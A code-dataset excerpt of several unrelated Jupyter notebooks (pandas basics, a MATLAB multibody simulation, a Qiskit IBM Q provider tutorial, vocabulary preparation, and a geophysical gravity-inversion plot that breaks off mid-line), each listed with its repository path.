code
stringlengths
38
801k
repo_path
stringlengths
6
263
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Pandas examples # This notebook contains selected Pandas examples import pandas as pd # ## Load data # Load csv file into Pandas data frame df = pd.read_csv('housing.csv') # ## Explore dataframe # Display pandas dataframe (standard visualization) df # shows a quick statistic summary of your data df.describe() # Select a single column (creates Series) df["age"] # Selecting N rows df[0:3] # Select slice of the data frame - Rows from 25 to 30, specified columns df.loc[25:30, ["age", "dis", "lstat"]] # ## "Querying" Pandas # Conditional slicing, both conditions must apply df.loc[(df["crim"] > 0.3) & (df["crim"] < 0.4)] # Conditional slicing, either condition apply df.loc[(df["rad"] == 1) | (df["zn"] != 0)] # ## Transform # Create column from another column multiplied by 2 df["double_tax"] = df["tax"] * 2 df # Aggregate df.groupby("rad").sum()
experimental/notebook-workspace/tutorials/pandas.ipynb
% --- % jupyter: % jupytext: % text_representation: % extension: .m % format_name: light % format_version: '1.5' % jupytext_version: 1.14.4 % kernelspec: % display_name: Matlab % language: matlab % name: matlab % --- % # Test using Jupyter % %-------------------------------------------------------------------------% % %------------------------------Multibody Dynamic--------------------------% % %------------------------------A toy system-------------------------------% % % Problem: 12 spherical bodies in a box % % Author: <NAME> % % Data: 2Abr16 % % Version: 0.0 % %-------------------------------------------------------------------------% clc clear all addpath('./dynamic') addpath('./contact') % # Global variables % + global World % used to describe the world global BodyList % List with body identifiers global JointList % List with dynamic constrains identifiers global Bodies % Structure with every rigid bodies in the system global Joints % Structure with dynamics constrains global Motors global Motor global TT Er % - % # World parameters % Force to be applied on each body World.gravity=[0;0;-0.00981]; % Baumgarte Method World.alpha=5.0; World.beta=5.0; World.K=1000; % Debugging information % + World.C1=[]; World.Err=[]; World.delta = 0.01; World.Error = 1e-7; World.debuging = false; World.contact = false; World.dist=[]; World.FMNcontact = true; World.FMNdensity = false; World.box = [0 0 -4 ; 4 4 8]; World.Nx=(World.box(2,1)-World.box(1,1))/World.delta; World.Ny=(World.box(2,2)-World.box(1,2))/World.delta; World.Nz=(World.box(2,3)-World.box(1,3))/World.delta; World.Min=[2^log2(World.Nx)-1 2^log2(World.Ny)-1 2^log2(World.Nz)-1]'; World.Max=[2^(log2(World.Nx)+1)+1 2^(log2(World.Ny)+1)+1 2^(log2(World.Nz)+1)+1]'; World.ecoder_x=zeros(1,fix(World.Max(1))); World.INTecoder_x=zeros(1,fix(World.Max(1))); World.ecoder_y=zeros(1,fix(World.Max(2))); World.INTecoder_y=zeros(1,fix(World.Max(2))); World.ecoder_z=zeros(1,fix(World.Max(3))); 
World.INTecoder_z=zeros(1,fix(World.Max(3))); % - % Flexible Multibody system World.Flexible=false; World.ElasticNet = false; % force are generated using and elastic network World.Regularistion = false; % # Multibody system configuration BodyList={}; % the initial list of bodies is empty JointList={'Fix'}; % list of dynamic constrains Motors={}; % ## Ground: body C1 % Geometry Bodies.Ground.geo.m=1; % rod mass Bodies.Ground.geo.h=1; % rod length Bodies.Ground.geo.r=1; % rod radius Bodies.Ground.flexible=false; % Inertia tensor for body C1 Bodies.Ground.geo.JP=diag([1/12*(Bodies.Ground.geo.m*(3*Bodies.Ground.geo.r^2+Bodies.Ground.geo.h^2)),1/2*(Bodies.Ground.geo.m*Bodies.Ground.geo.r^2),... 1/12*(Bodies.Ground.geo.m*(3*Bodies.Ground.geo.r^2+Bodies.Ground.geo.h^2))]); % List of points in Ground Bodies.Ground.PointsList={'BoxC'}; Bodies.Ground.Points.BoxC.sPp=[0,0,0]'; % local frame coordinates % List of vectors in Ground Bodies.Ground.VectorsList={}; % Body initial values % + Bodies.Ground.r=[0,0,0]'; Bodies.Ground.r_d=[0,0,0]'; Bodies.Ground.r_dd=[0,0,0]'; Bodies.Ground.p=[1,0,0,0]'; Bodies.Ground.p_d=[0,0,0,0]'; Bodies.Ground.w=[0,0,0]'; Bodies.Ground.wp=[0,0,0]'; Bodies.Ground.np=[0,0,0]'; Bodies.Ground.contact=true; Bodies.Ground.box_center ='BoxC'; Bodies.Ground.box = [0 0 0 ; 4 4 0.1]; Bodies.Ground.shape = @(x) abs(x(1))<0 || abs(x(1))>4 || abs(x(2))<0 || abs(x(2))>4 || abs(x(3))<.1; Bodies.Ground.normal = @(x)[0 0 1]'; Bodies.Ground.ord=1; Bodies.Ground.exists=true; % debuging forces Bodies.Ground.forca=[]; % - % ## Body 12 spheres % Geometry % + init_1=.2; init_2=.2; init_3=1.0; inc=.3; cont_1=init_1; cont_2=init_2; cont_3=init_3; for i=1: 1 % 2 % 4 .. 138.4674 12 .. 
169.5493 name=sprintf('C%d',i); Bodies.(name).geo.m=1; % rod mass Bodies.(name).geo.h=1; % rod length Bodies.(name).geo.r=1; % rod radius Bodies.(name).flexible=false; % Inertia tensor for spheres Bodies.(name).geo.JP=diag([1/12*(Bodies.(name).geo.m*(3*Bodies.(name).geo.r^2+Bodies.(name).geo.h^2)),1/2*(Bodies.(name).geo.m*Bodies.(name).geo.r^2),... 1/12*(Bodies.(name).geo.m*(3*Bodies.(name).geo.r^2+Bodies.(name).geo.h^2))]); %List of points in each sphere Bodies.(name).PointsList={'BoxC'}; Bodies.(name).Points.BoxC.sPp=[0,0,0]'; % local frame coordinates %List of vectors in each sphere Bodies.(name).VectorsList={}; % Body initial values Bodies.(name).r=[cont_1,cont_2,cont_3]'; if cont_1>3*init_1 cont_1=init_1; cont_3=cont_3+inc; end if cont_3>3*init_3 cont_1=init_1; cont_3=init_3; cont_1=cont_1+inc; end cont_3=cont_3+inc; Bodies.(name).r_d=[0,0,0]'; Bodies.(name).r_dd=[0,0,0]'; Bodies.(name).p=[1,0,0,0]'; Bodies.(name).p_d=[0,0,0,0]'; Bodies.(name).w=[0,0,0]'; Bodies.(name).wp=[0,0,0]'; Bodies.(name).np=[0,0,0]'; Bodies.(name).contact=true; Bodies.(name).box_center ='BoxC'; Bodies.(name).box = [-.2 -.2 -.2 ; .2 .2 .2]; Bodies.(name).shape = @(x)x'*x< 0.01 ; Bodies.(name).normal = @(x)x/norm(x); Bodies.(name).ord=i+1; Bodies.(name).exists=true; % debuging forces Bodies.(name).forca=[]; end % - % # System dynamic constrains % % Fixing ground Joints.Fix.type='Fix'; % fix body in the space Joints.Fix.body_1='Ground'; % body identifier % Transport Multibody system information % + BodyList=fieldnames(Bodies); World.nbodies = length(BodyList); % number of bodies in the system World.njoints = length(JointList); % number of joints in the system World.nmotors = length(Motors); % number of motors in the system World.NNodes = 0; % count number of nodes in the system World.Msize = World.NNodes*6+World.nbodies*6; % mass matrix size % - % # Mass matrix assembly % + y_d=[]; nbodies=length(BodyList); World.M=zeros(nbodies*6); for indexE=1:nbodies BodyName=BodyList{indexE}; 
Bodies.(BodyName).g=World.gravity; O=zeros(3,3); index=(indexE-1)*6+1; Bodies.(BodyName).index=index; % body index in the mass matrix % recursive definition for the initial force y_d=[y_d; Bodies.(BodyName).r;Bodies.(BodyName).p;Bodies.(BodyName).r_d;Bodies.(BodyName).w]; end % - % # Start simulation % Seting integration parameters % + t0=0; % Initial time t=4.5; % Final time 7.22 step=0.01; % Time-step tspan = [t0:step:t]; % Set integrator and its parameters fprintf('\n\n ODE45\n\n') tol=1e-5; options=odeset('RelTol',tol,'Stats','on','OutputFcn',@odeOUT); tic [T, yT]= ode45(@updateaccel, tspan, y_d, options); timeode45=toc % - % # Graphic output % + fig=figure; for index=1:nbodies BodyName=BodyList{index}; plot(yT(:,(index-1)*13+2), yT(:,(index-1)*13+3)) hold on end xlabel('y'),ylabel('z') % print(fig,'Positionyz','-dpng') hold off % - fig=figure; for index=1:nbodies BodyName=BodyList{index}; plot(yT(:,(index-1)*13+1), yT(:,(index-1)*13+3)) hold on end xlabel('x'),ylabel('z') % print(fig,'Positionxz','-dpng') hold off % Velocidades**2 fig=figure; for indexE=1:nbodies L=yT(:,(indexE-1)*13+8:(indexE-1)*13+10); v=[]; for i=1:length(L) v=[v L(i,:)*L(i,:)']; end plot(T, v) hold on end xlabel('T'),ylabel('v^2[m/s]') %print(fig,'velocity','-dpng') hold off % + % Error on the system constrains fig=figure; plot( Err) xlabel('iteration'),ylabel('Error') hold off % - % z vs time fig=figure; for indexE=1:nbodies L=yT(:,(indexE-1)*13+3); plot(T, L) hold on end xlabel('T'),ylabel('z') % ## 3D slider-crank Slieder_Crank_v01 % ## 3D slider-crank with clearance Slieder_Crank_clearance_v01
ToyDIMtools/Test.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <img src="../../images/qiskit-heading.gif" alt="Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook" width="500 px" align="left"> # # The IBM Q Provider # In Qiskit we have an interface for backends and jobs that is useful for running circuits and extending to third-party backends. In this tutorial, we will review the core components of Qiskit’s base backend framework, using the IBM Q Provider as an example. # # The interface has three main component: providers, backends, and jobs: # # - providers: access backends and provides backend objects # - backends: run the quantum circuit # - jobs: keep track of the submitted job # ## The Provider # # The IBM Q Provider is an entity that provides access to groups of different backends (for example, backends available through the open IBM Q Experience, or specific groups in the IBM Q Network). # # The IBM Q Provider main point of entry is as `qiskit.IBMQ`. This is an object that allows obtaining `provider` instances, corresponding to your IBM Q Experience capabilities: # # - `providers()`: returns all the provider objects in your account. # - `get_provider(hub, group, project)`: returns the specified provider. # # Additionally, it has some extra functions for handling administrative tasks. The credentials can be saved to disk or used in a session and never saved. 
# # - `enable_account(token, url)`: enable the account in the current session # - `disable_account(**kwargs)`: disable the accounts from current session # - `save_account(token)`: save the account to disk # - `delete_account(**kwargs)`: delete the account from disk # - `load_account(**kwargs)`: load previously-saved account into session # - `active_account()`: list the account active in this session # - `stored_account()`: list the account saved to disk # # The `provider` objects obtained through `get_provider()` inherit from BaseProvider and implement the methods: # # - `backends()`: returns all backend objects known to the provider. # - `get_backend(name)`: returns the named backend. # # # <div class="alert alert-block alert-info"> # <b>Note:</b> The use of `provider` instances is the default way of retrieving backends from Qiskit 0.11 onwards - if you have been using earlier versions of Qiskit, check the "Updating from previous versions" section for more detailed instructions on updating and using the different options.</div> # </div> # + from qiskit import IBMQ IBMQ.providers() # - # Here we see that there are no providers. This is because no accounts have been loaded. # Let's start fresh and delete any accounts on disk. If no accounts are on disk, this will error IBMQ.delete_account() # verify that there are no accounts stored now IBMQ.stored_account() # To enable an account (useful for one-off use, or if you don't want to save to disk) # Change this to be your API Token my_api_token = '<PASSWORD>' provider = IBMQ.enable_account(my_api_token) # The `IBMQ.enable_account()` and `IBMQ.load_account()` methods will automatically return the provider for the open IBM Q Experience, for convenience. 
To see what providers you have available IBMQ.providers() # and backends which are available in the default provider provider.backends() # Disable that account (so we go back to no accounts active) IBMQ.disable_account() # Now no providers are available IBMQ.providers() # For convenience, you can save your account to disk: IBMQ.save_account(my_api_token, overwrite=True) # Now it should show up as present on disk # + # uncomment to print to screen (it will show your token and url) # IBMQ.stored_account() # - # but no account active in current session yet IBMQ.active_account() # now load up the account stored to disk provider = IBMQ.load_account() # If you have access to multiple hubs, you can obtain a provider for each of them using `.get_provider()`: provider_1 = IBMQ.get_provider(hub='open') provider_1.backends() provider_2 = IBMQ.get_provider(hub='ibm-q-internal') provider_2.backends() # ## Filtering the backends # # You may also optionally filter the set of returned backends, by passing arguments that query the backend's `configuration`, `status`, or `properties`. The filters are passed by conditions, and for more general filters you can make advanced functions using the lambda function. # # As a first example: only return currently operational devices provider.backends(operational=True, simulator=False) # only return backends that are real devices, have at most 5 qubits, and are operational provider.backends(filters=lambda x: x.configuration().n_qubits <= 5 and not x.configuration().simulator and x.status().operational==True) # Filter: show the least busy device (in terms of pending jobs in the queue) # + from qiskit.providers.ibmq import least_busy small_devices = provider.backends(filters=lambda x: x.configuration().n_qubits == 5 and not x.configuration().simulator) least_busy(small_devices) # - # The above filters can be combined as desired. # # If you just want to get an instance of a particular backend, you can use the `get_backend()` method. 
provider.get_backend('ibmq_16_melbourne') # ## The backend # # Backends represent either a simulator or a real quantum computer, and are responsible for running quantum circuits and returning results. Their `run` method takes in a `qobj` as input, which is a quantum object and the result of the compilation process; it returns a BaseJob object. This object allows asynchronous running of jobs for retrieving results from a backend when the job is completed. # # At a minimum, backends use the following methods, inherited from BaseBackend: # # # - `provider` - returns the provider of the backend. # - `name()` - gets the name of the backend. # - `status()` - gets the status of the backend. # - `configuration()` - gets the configuration of the backend. # - `properties()` - gets the properties of the backend. # - `run()` - runs a qobj on the backend. # # For remote backends, they must also support # # - `jobs()` - returns a list of previous jobs executed by this user on this backend. # - `retrieve_job()` - returns a job by a job_id. # # In future updates they will introduce the following commands # # - `defaults()` - gives a data structure of typical default parameters. # - `schema()` - gets a schema for the backend # # There are some IBM Q-only functions # # - `hub` - returns the IBM Q hub for this backend. # - `group` - returns the IBM Q group for this backend. # - `project` - returns the IBM Q project for this backend. backend = least_busy(small_devices) # Let's start with the `backend.provider`, which returns a provider object backend.provider # Next is the `name()`, which returns the name of the backend backend.name() # Next let's look at the `status()`: # # operational lets you know that the backend is taking jobs # pending_jobs lets you know how many jobs are in the queue backend.status() # The next is `configuration()` backend.configuration() # The next is `properties()` method backend.properties() # The next is `hub`, `group`, and `project`. 
For the IBM Q experience these will return `None` backend.hub backend.group backend.project # To see your last 5 jobs run on the backend, use the `jobs()` method of that backend for ran_job in backend.jobs(limit=5): print(str(ran_job.job_id()) + " " + str(ran_job.status())) # Then the job can be retreived using the `retrieve_job(job_id())` method job = backend.retrieve_job(ran_job.job_id()) # ## The Job object # # Job instances can be thought of as the “ticket” for a submitted job. They find out the execution’s state at a given point in time (for example, if the job is queued, running, or has failed), and allow control over the job. They have the following methods: # # - `status()` - returns the status of the job. # - `backend()` - returns the backend the job was run on. # - `job_id()` - gets the job_id. # - `cancel()` - cancels the job. # - `result()` - gets the results from the circuit run. # # IBM Q-only functions # # - `creation_date()` - gives the date at which the job was created. # - `queue_position()` - gives the position of the job in the queue. # - `error_message()` - gives the error message of failed jobs. # Let's start with the `status()`. This returns the job status and a message job.status() # To get a backend object from the job, use the `backend()` method backend_temp = job.backend() backend_temp # To get the job_id use the `job_id()` method job.job_id() # To get the result from the job, use the `result()` method result = job.result() counts = result.get_counts() print(counts) # If you want to check the creation date, use `creation_date()` job.creation_date() # Let's make an active example from qiskit import * from qiskit.compiler import transpile, assemble qr = QuantumRegister(3) cr = ClassicalRegister(3) circuit = QuantumCircuit(qr, cr) circuit.x(qr[0]) circuit.x(qr[1]) circuit.ccx(qr[0], qr[1], qr[2]) circuit.cx(qr[0], qr[1]) circuit.measure(qr, cr) # To compile this circuit for the backend, use the compile function. 
It will make a qobj (quantum object) that can be run on the backend using the `run(qobj)` method. qobj = assemble(transpile(circuit, backend=backend), shots=1024) job = backend.run(qobj) # The status of this job can be checked with the `status()` method job.status() # If you made a mistake and need to cancel the job, use the `cancel()` method. # + import time #time.sleep(10) job.cancel() # - # The `status()` will show that the job cancelled. job.status() # To rerun the job and set up a loop to check the status and queue position, use the `queue_position()` method. job = backend.run(qobj) from qiskit.tools.monitor import job_monitor job_monitor(job) result = job.result() counts = result.get_counts() print(counts) # ## Updating from previous versions # # Since July 2019 (and with `Qiskit` version `0.11`), the IBM Q Provider defaults to using the new [IBM Q Experience](https://quantum-computing.ibm.com), which supersedes the legacy Quantum Experience and Qconsole. # # If you have credentials for the legacy Quantum Experience or Qconsole stored in disk, you can make use of `IBMQ.update_account()` helper. This helper will read your current credentials stored in disk and attempt to convert them: # # + # IBMQ.update_account() # - # You can find more information on how to update your programs in the [README.md](https://github.com/Qiskit/qiskit-ibmq-provider/blob/master/README.md#updating-to-the-new-ibm-q-experience) file in the provider repository.
qiskit/basics/2_the_ibmq_provider.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import re import pickle import collections import numpy as np import os # + def clearstring(string): string = re.sub('[^\'\"A-Za-z0-9 ]+', '', string) string = string.split(' ') string = filter(None, string) string = [y.strip() for y in string] string = [y for y in string if len(y) > 3 and y.find('nbsp') < 0] return ' '.join(string) def read_data(location): list_folder = os.listdir(location) label = list_folder label.sort() outer_string, outer_label = [], [] for i in range(len(list_folder)): list_file = os.listdir('data/' + list_folder[i]) strings = [] for x in range(len(list_file)): with open('data/' + list_folder[i] + '/' + list_file[x], 'r') as fopen: strings += fopen.read().split('\n') strings = list(filter(None, strings)) for k in range(len(strings)): strings[k] = clearstring(strings[k]) labels = [i] * len(strings) outer_string += strings outer_label += labels dataset = np.array([outer_string, outer_label]) dataset = dataset.T np.random.shuffle(dataset) string = [] for i in range(dataset.shape[0]): string += dataset[i][0].split() return string def build_vocab(words, n_words): count = [['UNK', -1]] count.extend(collections.Counter(words).most_common(n_words - 1)) dictionary = dict() for word, _ in count: dictionary[word] = len(dictionary) data = list() unk_count = 0 for word in words: index = dictionary.get(word, 0) if index == 0: # dictionary['UNK'] unk_count += 1 data.append(index) count[0][1] = unk_count reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys())) return data, count, dictionary, reversed_dictionary # - strings = read_data('data') strings[:5] n_words = len(set(strings)) _,_,dictionary,reversed_dictionary = build_vocab(strings,n_words) with open('dataset-dictionary.p', 'wb') as fopen: 
pickle.dump(reversed_dictionary, fopen) with open('dataset-dictionary-reverse.p', 'wb') as fopen: pickle.dump(dictionary, fopen)
classification-comparison/preparation/prepare-vocab.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # 2D Isostatic gravity inversion - Figures # Este [IPython Notebook](http://ipython.org/videos.html#the-ipython-notebook) utiliza a biblioteca de código aberto [Fatiando a Terra](http://fatiando.org/) # + active="" # Figures - rifted margin (model A) # + # %matplotlib inline import numpy as np from scipy.misc import derivative import scipy as spy from scipy import interpolate import matplotlib #matplotlib.use('TkAgg', force=True) import matplotlib.pyplot as plt from matplotlib.ticker import MaxNLocator import math import cPickle as pickle import datetime import string as st from scipy.misc import imread from __future__ import division from fatiando import gravmag, mesher, utils, gridder from fatiando.mesher import Prism, Polygon from fatiando.gravmag import prism from fatiando.utils import ang2vec, si2nt, contaminate from fatiando.gridder import regular from fatiando.vis import mpl from numpy.testing import assert_almost_equal from numpy.testing import assert_array_almost_equal from pytest import raises plt.rc('font', size=16) # - import functions as fc # ## Observation coordinates. 
# + # Model`s limits ymin = 0.0 ymax = 195000.0 zmin = -1000.0 zmax = 37400.0 xmin = -100000.0 xmax = 100000.0 area = [ymin, ymax, zmax, zmin] # - ny = 150 # number of observation datas and number of prisms along the profile # coordinates defining the horizontal boundaries of the # adjacent columns along the profile y = np.linspace(ymin, ymax, ny) # coordinates of the center of the columns forming the # interpretation model n = ny - 1 dy = (ymax - ymin)/n ycmin = ymin + 0.5*dy ycmax = ymax - 0.5*dy yc = np.reshape(np.linspace(ycmin, ycmax, n),(n,1)) x = np.zeros_like(yc) z = np.zeros_like(yc)-150.0 ## Edge extension (observation coordinates) sigma = 2.0 edge = sigma*dy*n # ## Model parameters # + # Model densities # Indices and polygons relationship: # cc = continental crust layer # oc = ocean crust layer # w = water layer # s = sediment layer # m = mantle layer dw = np.array([1030.0]) ds = np.array([2600.0]) dcc = np.array([2790.0]) doc = np.array([2850.0]) dm = np.array([3200.0]) #dc = dcc # coordinate defining the horizontal boundaries of the continent-ocean boundary COT = 117000.0 # list defining crust density variance dc = np.zeros_like(yc) aux = yc <= COT for i in range(len(yc[aux])): dc[i] = dcc for i in range(len(yc[aux]),n): dc[i] = doc # defining sediments layers density vector ds = np.reshape(np.repeat(ds,n),(n,1)) # S0 => isostatic compensation surface (Airy's model) S0 = np.array([29500.0]) # - # ## Synthetic data gsyn = np.reshape(np.loadtxt('../data/A-model-rifted-margin-synthetic-gravity-data.txt'),(n,1)) # ## Water bottom tw = np.reshape(np.loadtxt('../data/A-model-rifted-margin-bathymetry.txt'),(n,1)) # ## True surfaces # + true_basement = np.reshape(np.loadtxt('../data/A-model-rifted-margin-true-basement-surface.txt'),(n,1)) true_moho = np.reshape(np.loadtxt('../data/A-model-rifted-margin-true-moho-surface.txt'),(n,1)) # True reference moho surface (SR = S0+dS0) true_S0 = np.array([29500.0]) true_dS0 = np.array([1500.0]) # + # True layer 
sediments thickness true_ts = true_basement - tw # True layer mantle thickness true_tm = S0 - true_moho # true parameters vector ptrue = np.vstack((true_ts, true_tm, true_dS0)) # - # ## Initial guess surfaces # + # initial guess basement surface ini_basement = np.reshape(np.loadtxt('../data/A-model-rifted-margin-initial-basement-surface.txt'),(n,1)) # initial guess moho surface ini_moho = np.reshape(np.loadtxt('../data/A-model-rifted-margin-initial-moho-surface.txt'),(n,1)) # initial guess reference moho surface (SR = S0+dS0) ini_dS0 = np.array([8500.0]) ini_RM = S0 + ini_dS0 # - # ## Known depths # + # Known values: basement and moho surfaces base_known = np.loadtxt('../data/A-model-rifted-margin-basement-known-depths.txt', ndmin=2) moho_known = np.loadtxt('../data/A-model-rifted-margin-moho-known-depths.txt', ndmin=2) # - # ## Initial guess data g0 = np.reshape(np.loadtxt('../data/A-model-rifted-margin-initial-guess-gravity-data.txt'),(n,1)) # ## Inversion model # + active="" # g = np.reshape(np.loadtxt('../data/A-model-rifted-margin-predicted-gravity-data-alphas_-10(3)_-8(1)_-7(2)_-7(1)_-6(2).txt'),(n,1)) # p = np.reshape(np.loadtxt('../data/A-model-rifted-margin-parameter-vector-alphas_-10(3)_-8(1)_-7(2)_-7(1)_-6(2).txt'),(2*n+1,1)) # gama_list = np.loadtxt('../data/A-model-rifted-margin-gama-list-alphas_-10(3)_-8(1)_-7(2)_-7(1)_-6(2).txt') # - g = np.reshape(np.loadtxt('../data/A-model-rifted-margin-predicted-gravity-data-alphas_X_-8(1)_-7(2)_-7(1)_-6(2).txt'),(n,1)) p = np.reshape(np.loadtxt('../data/A-model-rifted-margin-parameter-vector-alphas_X_-8(1)_-7(2)_-7(1)_-6(2).txt'),(2*n+1,1)) gama_list = np.loadtxt('../data/A-model-rifted-margin-gama-list-alphas_X_-8(1)_-7(2)_-7(1)_-6(2).txt') # + active="" # g0 = g.copy() # ini_basement = tw + p[0:n] # ini_moho = S0 - p[n:n+n] # ini_dS0 = p[n+n] # + active="" # g = np.reshape(np.loadtxt('../data/A-model-rifted-margin-predicted-gravity-data-alphas_-10(3)_-7(1)_-6(2)_-7(1)_-6(2)-sgm_1.txt'),(n,1)) # p = 
np.reshape(np.loadtxt('../data/A-model-rifted-margin-parameter-vector-alphas_-10(3)_-7(1)_-6(2)_-7(1)_-6(2)-sgm_1.txt'),(2*n+1,1)) # - # Inverrsion results RM = S0 + p[n+n] basement = tw + p[0:n] moho = S0 - p[n:n+n] # ## Lithostatic Stress # + sgm_true = 9.81*(10**(-6))*(dw*tw + ds*true_ts + dc*(S0-tw-true_ts-true_tm)+dm*true_tm) sgm = 9.81*(10**(-6))*(dw*tw + ds*p[0:n] + dc*(S0-tw-p[0:n]-p[n:n+n])+dm*p[n:n+n]) # - # ## Inversion model plot # + polygons_water = [] for (yi, twi) in zip(yc, tw): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_water.append(Polygon(np.array([[y1, y2, y2, y1], [0.0, 0.0, twi, twi]]).T, props={'density': dw - dcc})) polygons_sediments = [] for (yi, twi, si, dsi) in zip(yc, np.reshape(tw,(n,)), np.reshape(basement,(n,)), ds): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_sediments.append(Polygon(np.array([[y1, y2, y2, y1], [twi, twi, si, si]]).T, props={'density': ds - dcc})) polygons_crust = [] for (yi, si, Si, dci) in zip(yc, np.reshape(basement,(n,)), np.reshape(moho,(n,)), dc): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_crust.append(Polygon(np.array([[y1, y2, y2, y1], [si, si, Si, Si]]).T, props={'density': dci - dcc})) polygons_mantle = [] for (yi, Si) in zip(yc, np.reshape(moho,(n,))): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_mantle.append(Polygon(np.array([[y1, y2, y2, y1], [Si, Si, S0+p[n+n], S0+p[n+n]]]).T, props={'density': dm - dcc})) # + # %matplotlib inline plt.close('all') fig = plt.figure(figsize=(12,16)) import matplotlib.gridspec as gridspec heights = [8, 8, 8, 1] gs = gridspec.GridSpec(4, 1, height_ratios=heights) ax1 = plt.subplot(gs[0]) ax2 = plt.subplot(gs[1]) ax3 = plt.subplot(gs[2]) ax4 = plt.subplot(gs[3]) ax1.axhline(y=0.0, xmin=ymin, xmax=ymax, color='k', linestyle='--', linewidth=1) ax1.plot(0.001*yc, gsyn, 'or', mfc='none', markersize=7, label='simulated data') ax1.plot(0.001*yc, g0, '-b', linewidth=2, label='initial guess data') ax1.plot(0.001*yc, g, '-g', linewidth=2, label='predicted data') 
ax1.set_xlim(0.001*ymin, 0.001*ymax) ax1.set_ylabel('gravity disturbance (mGal)', fontsize=16) ax1.set_xticklabels(['%g'% (l) for l in ax1.get_xticks()], fontsize=14) ax1.set_yticklabels(['%g'% (l) for l in ax1.get_yticks()], fontsize=14) ax1.legend(loc='best', fontsize=14, facecolor='silver') ax2.plot(0.001*yc, sgm_true, 'or', mfc='none', markersize=8, label='simulated lithostatic stress') ax2.plot(0.001*yc, sgm, '-g', linewidth=2, label='predicted lithostatic stress') ax2.set_xlim(0.001*ymin, 0.001*ymax) ax2.set_ylim(770,860) ax2.set_ylabel('Lithostatic Stress (MPa)', fontsize=16) ax2.set_xticklabels(['%g'% (l) for l in ax2.get_xticks()], fontsize=14) ax2.set_yticklabels(['%g'% (l) for l in ax2.get_yticks()], fontsize=14) ax2.legend(loc='best', fontsize=14, facecolor='silver') ax3.axhline(y=0.0, xmin=ymin, xmax=ymax, color='k', linestyle='-', linewidth=1) aux = yc <= COT for (pwi) in (polygons_water): tmpx = [x for x in pwi.x] tmpx.append(pwi.x[0]) tmpy = [y for y in pwi.y] tmpy.append(pwi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='lightskyblue') for (psi) in (polygons_sediments): tmpx = [x for x in psi.x] tmpx.append(psi.x[0]) tmpy = [y for y in psi.y] tmpy.append(psi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='tan') for (pci) in (polygons_crust[:len(yc[aux])]): tmpx = [x for x in pci.x] tmpx.append(pci.x[0]) tmpy = [y for y in pci.y] tmpy.append(pci.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='orange') for (pcoi) in (polygons_crust[len(yc[aux]):n]): tmpx = [x for x in pcoi.x] tmpx.append(pcoi.x[0]) tmpy = [y for y in pcoi.y] tmpy.append(pcoi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='olive') for (pmi) in (polygons_mantle): tmpx = [x for x in pmi.x] tmpx.append(pmi.x[0]) tmpy = [y for y in pmi.y] tmpy.append(pmi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='pink') ax3.plot(yc, tw, '-k', linewidth=3) ax3.plot(yc, 
true_basement, '-k', linewidth=3, label='true surfaces') ax3.plot(yc, true_moho, '-k', linewidth=3) ax3.plot(yc, ini_basement, '-.b', linewidth=3, label='initial guess surfaces') ax3.plot(yc, ini_moho, '-.b', linewidth=3) ax3.plot(yc, basement, '--w', linewidth=3, label='estimated surfaces') ax3.plot(yc, moho, '--w', linewidth=3) ax3.axhline(y=true_S0+true_dS0, xmin=ymin, xmax=ymax, color='k', linestyle='-', linewidth=3) ax3.axhline(y=S0+ini_dS0, xmin=ymin, xmax=ymax, color='b', linestyle='-.', linewidth=3) ax3.axhline(y=S0+p[n+n], xmin=ymin, xmax=ymax, color='w', linestyle='--', linewidth=3) ax3.plot(base_known[:,0], base_known[:,1], 'v', color = 'yellow', markersize=15, label='known depths (basement)') ax3.plot(moho_known[:,0], moho_known[:,1], 'D', color = 'lime', markersize=15, label='known depths (moho)') #ax3.set_ylim((S0+p[n+n]), zmin) ax3.set_ylim((39000.0), zmin) ax3.set_xlim(ymin, ymax) ax3.set_xlabel('y (km)', fontsize=16) ax3.set_ylabel('z (km)', fontsize=16) ax3.set_xticklabels(['%g'% (0.001*l) for l in ax3.get_xticks()], fontsize=14) ax3.set_yticklabels(['%g'% (0.001*l) for l in ax3.get_yticks()], fontsize=14) ax3.legend(loc='lower right', fontsize=14, facecolor='silver') X, Y = fig.get_dpi()*fig.get_size_inches() plt.title('Density contrast (kg/m$^{3}$)', fontsize=17) ax4.axis('off') layers_list1 = ['water', 'sediment', 'continental', 'oceanic', 'mantle'] layers_list2 = ['', '', 'crust', 'crust', ''] colors_list = ['lightskyblue', 'tan', 'orange', 'olive', 'pink'] density_list = ['-1760', '-190', '0', '60', '410'] ncols = len(colors_list) nrows = 1 h = Y / nrows w = X / (ncols + 1) i=ncols-1 for color, density, layers1, layers2 in zip(colors_list, density_list, layers_list1, layers_list2): col = i // nrows row = i % nrows x = X - (col*w) - w yi_line = Y yf_line = Y - Y*0.15 yi_text1 = Y - Y*0.2 yi_text2 = Y - Y*0.28 yi_text3 = Y - Y*0.08 i-=1 poly = Polygon(np.array([[x, x+w*0.75, x+w*0.75, x], [yi_line, yi_line, yf_line, yf_line]]).T) tmpx = [x for 
